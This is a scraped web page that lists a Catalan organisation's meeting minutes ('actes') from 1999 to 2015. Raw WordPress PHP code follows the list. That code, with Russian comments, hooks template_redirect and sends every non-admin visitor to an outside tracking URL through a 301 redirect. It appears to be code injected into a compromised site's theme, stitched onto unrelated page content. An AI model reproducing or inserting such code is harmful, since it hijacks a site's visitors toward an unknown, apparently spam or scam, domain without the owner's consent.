Actes

2015_06_27_acta

2014_06_21_acta

2013_06_23_acta

2012_05_26_acta

2011_06_12_acta
2010_05_22_acta

2008_03_21_acta

2007_04_06_acta

2005_10_29_acta

2005_03_25_acta

2004_10_31_acta

2004_02_07_acta

2003_12_06_acta

2003_11_01_acta

2003_04_19_acta
2000_07_29_acta

2000_04_22_acta

1999_habilitacio

1999_04_03_acta

function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Template for displaying Comments * * The area of the page that contains both current comments * and the comment form. The actual display of comments is * handled by a callback to twentyten_comment which is * located in the functions.php file. * * @package WordPress * @subpackage Twenty_Ten * @since Twenty Ten 1.0 */ ?>